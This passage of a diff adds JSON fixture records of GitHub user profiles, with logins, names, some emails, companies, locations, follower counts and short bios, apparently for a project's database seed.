+ "created_at": "2012-11-21T22:23:41Z", + "updated_at": "2024-09-08T13:43:32Z", + "node_id": "MDQ6VXNlcjI4NTc2MzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1268, + "fields": { + "nest_created_at": "2024-09-11T23:17:05.021Z", + "nest_updated_at": "2024-09-11T23:24:36.679Z", + "name": "Andres Almiray", + "login": "aalmiray", + "email": "aalmiray@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13969?v=4", + "company": "", + "location": "Basel, Switzerland", + "collaborators_count": 0, + "following_count": 65, + "followers_count": 883, + "public_gists_count": 171, + "public_repositories_count": 253, + "created_at": "2008-06-17T00:30:56Z", + "updated_at": "2024-09-05T07:55:11Z", + "node_id": "MDQ6VXNlcjEzOTY5", + "bio": "I code for fun and help others in the process. Java Champion. Co-founder of Hackergarten & Hack.Commit.Push. Creator of @jreleaser 🚀", + "is_hireable": false, + "twitter_username": "aalmiray" + } +}, +{ + "model": "github.user", + "pk": 1269, + "fields": { + "nest_created_at": "2024-09-11T23:17:06.692Z", + "nest_updated_at": "2024-09-11T23:17:06.692Z", + "name": "", + "login": "SSarka69", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121481361?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-27T07:30:09Z", + "updated_at": "2022-12-27T07:30:09Z", + "node_id": "U_kgDOBz2okQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1270, + "fields": { + "nest_created_at": "2024-09-11T23:17:07.615Z", + "nest_updated_at": "2024-09-11T23:17:07.615Z", + "name": "Shunsuke Suzuki", + "login": "suzuki-shunsuke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13323303?v=4", + "company": "", + "location": "Tokyo, Japan", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 323, + "public_gists_count": 33, + "public_repositories_count": 505, + "created_at": "2015-07-13T23:22:32Z", + "updated_at": "2024-08-01T02:05:21Z", + "node_id": "MDQ6VXNlcjEzMzIzMzAz", + "bio": "Platform Engineer / OSS Developer / Go", + "is_hireable": false, + "twitter_username": "szkdash_en" + } +}, +{ + "model": "github.user", + "pk": 1271, + "fields": { + "nest_created_at": "2024-09-11T23:17:08.444Z", + "nest_updated_at": "2024-09-11T23:17:08.444Z", + "name": "", + "login": "Mrinnaal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30141047?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-07-13T07:07:29Z", + "updated_at": "2023-10-21T01:51:42Z", + "node_id": "MDQ6VXNlcjMwMTQxMDQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1272, + "fields": { + "nest_created_at": "2024-09-11T23:17:09.269Z", + "nest_updated_at": "2024-09-22T18:46:01.445Z", + "name": "Jim Klimov", + "login": "jimklimov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1636756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 43, + "public_gists_count": 28, + "public_repositories_count": 223, + "created_at": "2012-04-12T13:13:18Z", + "updated_at": "2024-09-11T22:22:42Z", + "node_id": "MDQ6VXNlcjE2MzY3NTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1273, + "fields": { + "nest_created_at": "2024-09-11T23:17:11.008Z", + "nest_updated_at": "2024-09-11T23:17:11.853Z", + "name": "Andrew Russell", + "login": "Andrew-Russell-fingo", + "email": "andrew.russell@fingo.co.nz", + "avatar_url": "https://avatars.githubusercontent.com/u/48190317?v=4", + "company": "Fingo", + "location": "Wellington NZ", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-03-03T23:19:28Z", + "updated_at": "2024-07-04T00:06:05Z", + "node_id": "MDQ6VXNlcjQ4MTkwMzE3", + "bio": "Oracle and Java Developer with a heap of experience working by and for Government in wellington.\r\nWorking for Fingo ltd.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1274, + "fields": { + "nest_created_at": "2024-09-11T23:17:12.696Z", + "nest_updated_at": "2024-09-11T23:17:12.696Z", + "name": "Ricardo A. Reyes", + "login": "RicardoAReyes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2433138?v=4", + "company": "www.Tidelift.com", + "location": "Washington, D.C. ", + "collaborators_count": 0, + "following_count": 91, + "followers_count": 28, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2012-09-27T00:45:40Z", + "updated_at": "2024-08-15T22:00:02Z", + "node_id": "MDQ6VXNlcjI0MzMxMzg=", + "bio": "Senior Solutions Architect @tidelift ", + "is_hireable": false, + "twitter_username": "Ricardo_A_Reyes" + } +}, +{ + "model": "github.user", + "pk": 1275, + "fields": { + "nest_created_at": "2024-09-11T23:17:13.546Z", + "nest_updated_at": "2024-09-11T23:17:13.546Z", + "name": "Beltran Rueda", + "login": "beltran-rubo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3718440?v=4", + "company": "VMware", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2013-02-27T16:46:33Z", + "updated_at": "2024-02-27T17:57:51Z", + "node_id": "MDQ6VXNlcjM3MTg0NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "beltranrubo" + } +}, +{ + "model": "github.user", + "pk": 1276, + "fields": { + "nest_created_at": "2024-09-11T23:17:14.352Z", + "nest_updated_at": "2024-09-11T23:17:14.352Z", + "name": "David Lambert", + "login": "DavidLambertCyber", + "email": "DavidLambertCyber@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8062671?v=4", + "company": "", + "location": "Earth", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-07-03T22:16:44Z", + "updated_at": "2023-06-30T18:10:52Z", + "node_id": "MDQ6VXNlcjgwNjI2NzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1277, + "fields": { + "nest_created_at": "2024-09-11T23:17:15.212Z", + "nest_updated_at": "2024-09-16T22:28:47.461Z", + "name": "", + "login": "nigellh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12110404?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-04-25T09:52:41Z", + "updated_at": "2024-09-03T15:32:53Z", + "node_id": "MDQ6VXNlcjEyMTEwNDA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1278, + "fields": { + "nest_created_at": "2024-09-11T23:17:17.771Z", + "nest_updated_at": "2024-09-11T23:17:17.771Z", + "name": "Behrouz Soroushian", + "login": "bsoroushian", + "email": "bsoroushian@vmware.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1178713?v=4", + "company": "VMware", + "location": "Toronto, Ontario, Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2011-11-07T18:54:10Z", + "updated_at": "2024-07-11T14:09:00Z", + "node_id": "MDQ6VXNlcjExNzg3MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1279, + "fields": { + "nest_created_at": "2024-09-11T23:17:18.584Z", + "nest_updated_at": "2024-09-11T23:27:44.683Z", + "name": "Riley Martine", + "login": "rmartine-ias", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107639398?v=4", + "company": "Integral Ad Science", + "location": "Denver, CO", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2022-06-16T16:36:22Z", + "updated_at": "2024-08-05T16:47:06Z", + "node_id": "U_kgDOBmpyZg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1280, + "fields": { + "nest_created_at": "2024-09-11T23:17:19.421Z", + "nest_updated_at": "2024-09-11T23:17:19.421Z", + "name": "Alex Mark", + "login": "alexthemark", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3020611?v=4", + "company": "-", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2012-12-12T00:20:13Z", + "updated_at": "2024-09-06T15:42:56Z", + "node_id": "MDQ6VXNlcjMwMjA2MTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1281, + "fields": { + "nest_created_at": "2024-09-11T23:17:20.390Z", + "nest_updated_at": "2024-09-12T01:26:54.679Z", + "name": "", + "login": "JayAtFujifilm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99899201?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-02-17T16:13:35Z", + "updated_at": "2024-07-25T20:59:53Z", + "node_id": "U_kgDOBfRXQQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1282, + "fields": { + "nest_created_at": "2024-09-11T23:17:22.026Z", + "nest_updated_at": "2024-09-11T23:17:22.026Z", + "name": "", + "login": "kimdu0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68895169?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2020-07-28T08:19:27Z", + "updated_at": "2024-08-31T04:25:44Z", + "node_id": "MDQ6VXNlcjY4ODk1MTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1283, + "fields": { + "nest_created_at": "2024-09-11T23:17:22.822Z", + "nest_updated_at": "2024-09-11T23:17:22.822Z", + "name": "", + "login": "pkiesslingsonatype", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113676419?v=4", + "company": "Sonatype", + "location": "Germany", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2022-09-16T09:22:16Z", + "updated_at": "2024-09-02T14:36:48Z", + "node_id": "U_kgDOBsaQgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1284, + "fields": { + "nest_created_at": "2024-09-11T23:17:23.679Z", + "nest_updated_at": "2024-09-11T23:17:23.679Z", + "name": "", + "login": "sridattadev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/145785451?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-22T14:45:34Z", + "updated_at": "2023-09-22T14:45:34Z", + "node_id": "U_kgDOCLCCaw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1285, + "fields": { + "nest_created_at": "2024-09-11T23:17:24.489Z", + "nest_updated_at": "2024-09-22T18:45:00.175Z", + "name": "Marc-Etienne Vargenau", + "login": "vargenau", + "email": "marc-etienne.vargenau@nokia.com", + "avatar_url": "https://avatars.githubusercontent.com/u/378154?v=4", + "company": "Nokia", + "location": "Massy, France", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2010-08-27T15:08:48Z", + "updated_at": "2024-09-18T18:05:02Z", + "node_id": "MDQ6VXNlcjM3ODE1NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1286, + "fields": { + "nest_created_at": "2024-09-11T23:17:25.413Z", + "nest_updated_at": "2024-09-11T23:17:26.229Z", + "name": "", + "login": "sphengle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15677654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-11-05T20:01:54Z", + "updated_at": "2022-12-01T09:09:21Z", + "node_id": "MDQ6VXNlcjE1Njc3NjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1287, + "fields": { + "nest_created_at": "2024-09-11T23:17:27.017Z", + "nest_updated_at": "2024-09-11T23:17:27.017Z", + "name": "", + "login": "Prochy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6740126?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-02-20T17:32:19Z", + "updated_at": "2024-06-13T07:59:53Z", + "node_id": "MDQ6VXNlcjY3NDAxMjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1288, + "fields": { + "nest_created_at": "2024-09-11T23:17:27.853Z", + "nest_updated_at": "2024-09-22T19:36:03.578Z", + "name": "Savek-CC", + "login": "savek-cc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13501427?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2015-07-25T21:53:53Z", + "updated_at": "2024-09-11T10:28:50Z", + "node_id": "MDQ6VXNlcjEzNTAxNDI3", + "bio": "IT security at day, hacking T1D at night", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1289, + "fields": { + "nest_created_at": "2024-09-11T23:17:28.681Z", + "nest_updated_at": "2024-09-11T23:17:28.681Z", + "name": "", + "login": "yaourabi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75521136?v=4", + "company": "", + "location": "Maroc", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-12-05T08:18:55Z", + "updated_at": "2024-05-16T12:38:50Z", + "node_id": "MDQ6VXNlcjc1NTIxMTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1290, + "fields": { + "nest_created_at": "2024-09-11T23:17:30.379Z", + "nest_updated_at": "2024-09-22T20:29:42.236Z", + "name": "", + "login": "jasonparallel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/602240?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 42, + "created_at": "2011-02-05T18:27:06Z", + "updated_at": "2023-12-19T17:06:50Z", + "node_id": "MDQ6VXNlcjYwMjI0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1291, + "fields": { + "nest_created_at": "2024-09-11T23:17:31.997Z", + "nest_updated_at": "2024-09-22T18:53:33.310Z", + "name": "", + "login": "andreas-hilti", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69210561?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-08-04T16:21:13Z", + "updated_at": "2024-07-08T13:30:02Z", + "node_id": "MDQ6VXNlcjY5MjEwNTYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1292, + "fields": { + "nest_created_at": "2024-09-11T23:17:32.871Z", + "nest_updated_at": "2024-09-11T23:17:32.871Z", + "name": "", + "login": "bhafner13", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/170467033?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-21T19:49:11Z", + "updated_at": "2024-05-21T19:49:39Z", + "node_id": "U_kgDOCike2Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1293, + "fields": { + "nest_created_at": "2024-09-11T23:17:34.483Z", + "nest_updated_at": "2024-09-17T23:42:23.047Z", + "name": "V3ct0r", + "login": "V3ct0r-v", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50343981?v=4", + "company": "", + "location": "Boston, MA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-05-06T22:51:25Z", + "updated_at": "2024-06-24T14:46:53Z", + "node_id": "MDQ6VXNlcjUwMzQzOTgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1294, + "fields": { + "nest_created_at": "2024-09-11T23:17:35.381Z", + "nest_updated_at": "2024-09-22T18:44:55.322Z", + "name": "František Erben", + "login": "ferben", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45659268?v=4", + "company": "Quadient", + "location": "Czech Republic", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-12-06T11:54:27Z", + "updated_at": "2024-08-05T10:45:45Z", + "node_id": "MDQ6VXNlcjQ1NjU5MjY4", + "bio": "Happy coder, mostly macOS platform, sometimes Linux, DevOps, Ansible etc.", + "is_hireable": false, + "twitter_username": "erbenfr" + } +}, +{ + "model": "github.user", + "pk": 1295, + "fields": { + "nest_created_at": "2024-09-11T23:17:36.206Z", + "nest_updated_at": "2024-09-11T23:17:36.206Z", + "name": "", + "login": "spnzig", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30037676?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-07-10T06:21:52Z", + "updated_at": "2024-07-02T07:09:32Z", + "node_id": "MDQ6VXNlcjMwMDM3Njc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1296, + "fields": { + "nest_created_at": "2024-09-11T23:17:37.012Z", + "nest_updated_at": "2024-09-12T01:35:40.096Z", + "name": "S Manjunath", + "login": "itmanju", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77400469?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-01-13T15:23:54Z", + "updated_at": "2024-07-03T08:33:47Z", + "node_id": "MDQ6VXNlcjc3NDAwNDY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1297, + "fields": { + "nest_created_at": "2024-09-11T23:17:37.835Z", + "nest_updated_at": "2024-09-11T23:17:37.835Z", + "name": "", + "login": "bharathkolanda", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175378804?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-07-12T04:05:51Z", + "updated_at": "2024-09-11T05:09:06Z", + "node_id": "U_kgDOCnQRdA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1298, + "fields": { + "nest_created_at": "2024-09-11T23:17:38.658Z", + "nest_updated_at": "2024-09-18T19:03:49.811Z", + "name": "", + "login": "AJquetta", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89043349?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-08-16T19:55:47Z", + "updated_at": "2024-09-13T08:47:27Z", + "node_id": "MDQ6VXNlcjg5MDQzMzQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1299, + "fields": { + "nest_created_at": "2024-09-11T23:17:39.477Z", + "nest_updated_at": "2024-09-11T23:17:39.477Z", + "name": "Giles Middleton @CACI", + "login": "Gilesey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66631077?v=4", + "company": "CACI Ltd", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-06-08T14:33:59Z", + "updated_at": "2023-03-16T14:48:10Z", + "node_id": "MDQ6VXNlcjY2NjMxMDc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1300, + "fields": { + "nest_created_at": "2024-09-11T23:17:40.306Z", + "nest_updated_at": "2024-09-11T23:17:40.306Z", + "name": "", + "login": "mbower10", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38541599?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-19T20:26:45Z", + "updated_at": "2021-06-01T01:06:30Z", + "node_id": "MDQ6VXNlcjM4NTQxNTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1301, + "fields": { + "nest_created_at": "2024-09-11T23:17:42.648Z", + "nest_updated_at": "2024-09-20T17:53:51.510Z", + "name": "", + "login": "wkoot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3715211?v=4", + "company": "", + "location": "Utrecht, NL", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2013-02-27T10:29:20Z", + "updated_at": "2024-09-11T20:10:01Z", + "node_id": "MDQ6VXNlcjM3MTUyMTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1302, + "fields": { + "nest_created_at": "2024-09-11T23:18:26.864Z", + "nest_updated_at": "2024-09-22T18:52:05.387Z", + "name": "Kyle Hammond", + "login": "macblazer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6825873?v=4", + "company": "@Jamf", + "location": "Saint Paul, MN", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-03-01T17:06:43Z", + "updated_at": "2024-09-20T14:56:24Z", + "node_id": "MDQ6VXNlcjY4MjU4NzM=", + "bio": "Principal Software Engineer at Jamf.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1303, + "fields": { + "nest_created_at": "2024-09-11T23:18:28.580Z", + "nest_updated_at": "2024-09-11T23:18:28.580Z", + "name": "", + "login": "antonioholling", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/160503263?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-02-19T13:49:49Z", + "updated_at": "2024-08-13T18:16:47Z", + "node_id": "U_kgDOCZEV3w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1304, + "fields": { + "nest_created_at": "2024-09-11T23:18:30.250Z", + "nest_updated_at": "2024-09-16T22:17:48.613Z", + "name": "", + "login": "BalkiX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15444542?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-10-30T15:03:23Z", + "updated_at": "2024-09-11T11:41:40Z", + "node_id": "MDQ6VXNlcjE1NDQ0NTQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1305, + "fields": { + "nest_created_at": "2024-09-11T23:18:54.295Z", + "nest_updated_at": "2024-09-22T18:53:15.547Z", + "name": "William Goff", + "login": "wrgoff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70279777?v=4", + "company": "Lockheed Martin", + "location": "Downingtown, PA 19335", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-08-26T15:24:25Z", + "updated_at": "2022-04-01T02:34:16Z", + "node_id": "MDQ6VXNlcjcwMjc5Nzc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1306, + "fields": { + "nest_created_at": "2024-09-11T23:18:57.643Z", + "nest_updated_at": "2024-09-22T19:42:03.921Z", + "name": "Sebastian Schuberth", + "login": "sschuberth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/349154?v=4", + "company": "CEO & CTO of @doubleopen-project", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 232, + "followers_count": 398, + "public_gists_count": 4, + "public_repositories_count": 117, + "created_at": "2010-07-30T10:42:04Z", + "updated_at": "2024-08-28T11:21:04Z", + "node_id": "MDQ6VXNlcjM0OTE1NA==", + "bio": "A Kotlin enthusiast who's enjoying to work with and on Open Source Software.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1307, + "fields": { + "nest_created_at": "2024-09-11T23:18:58.449Z", + "nest_updated_at": "2024-09-11T23:18:58.449Z", + "name": "Greg Gibeling", + "login": "gdgib", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/801167?v=4", + "company": "", + "location": "San Francisco Bay Area", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2011-05-20T20:04:55Z", + "updated_at": "2024-08-09T14:23:22Z", + "node_id": "MDQ6VXNlcjgwMTE2Nw==", + "bio": "Hardware & software architect. When I say full stack I'm not kidding: everything from transistors to copyright law. My job is curing cancer, coding is a hobby.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1308, + "fields": { + "nest_created_at": "2024-09-11T23:18:59.738Z", + "nest_updated_at": "2024-09-11T23:18:59.738Z", + "name": "", + "login": "bhuvi11", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14215473?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 51, + "created_at": "2015-09-10T09:47:28Z", + "updated_at": "2024-08-21T11:27:16Z", + "node_id": "MDQ6VXNlcjE0MjE1NDcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1309, + "fields": { + "nest_created_at": "2024-09-11T23:19:03.129Z", + "nest_updated_at": "2024-09-11T23:42:18.592Z", + "name": "A.J. Brown", + "login": "ajbrown", + "email": "aj@ajbrown.org", + "avatar_url": "https://avatars.githubusercontent.com/u/38450?v=4", + "company": "@sonatype", + "location": "Dayton, Ohio", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 26, + "public_gists_count": 30, + "public_repositories_count": 31, + "created_at": "2008-12-05T02:57:17Z", + "updated_at": "2024-07-31T14:43:46Z", + "node_id": "MDQ6VXNlcjM4NDUw", + "bio": "Principal Engineer @sonatype, Developer's developer, Technical Product Manager, Cloud Architect, and Race car driving Moon Gazer", + "is_hireable": false, + "twitter_username": "adrianjbrown" + } +}, +{ + "model": "github.user", + "pk": 1310, + "fields": { + "nest_created_at": "2024-09-11T23:19:06.484Z", + "nest_updated_at": "2024-09-11T23:19:06.484Z", + "name": "", + "login": "d-baer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22482986?v=4", + "company": "@mt-ag", + "location": "Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2016-09-27T20:15:54Z", + "updated_at": "2024-08-16T11:30:25Z", + "node_id": "MDQ6VXNlcjIyNDgyOTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1311, + "fields": { + "nest_created_at": "2024-09-11T23:19:08.114Z", + "nest_updated_at": "2024-09-22T18:45:28.557Z", + "name": "David Meibusch", + "login": "dmeibusch", + "email": "David.Meibusch@oracle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28517621?v=4", + "company": "@oracle ", + "location": "GMT+10", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-05-07T23:49:25Z", + "updated_at": "2024-09-11T00:06:24Z", + "node_id": "MDQ6VXNlcjI4NTE3NjIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1312, + "fields": { + "nest_created_at": "2024-09-11T23:19:08.958Z", + "nest_updated_at": "2024-09-22T19:28:13.088Z", + "name": "Hervé Boutemy", + "login": "hboutemy", + "email": "hboutemy@apache.org", + "avatar_url": "https://avatars.githubusercontent.com/u/237462?v=4", + "company": "", + "location": "Suresnes (France)", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 137, + "public_gists_count": 6, + "public_repositories_count": 300, + "created_at": "2010-04-05T20:48:09Z", + "updated_at": "2024-09-16T15:13:13Z", + "node_id": 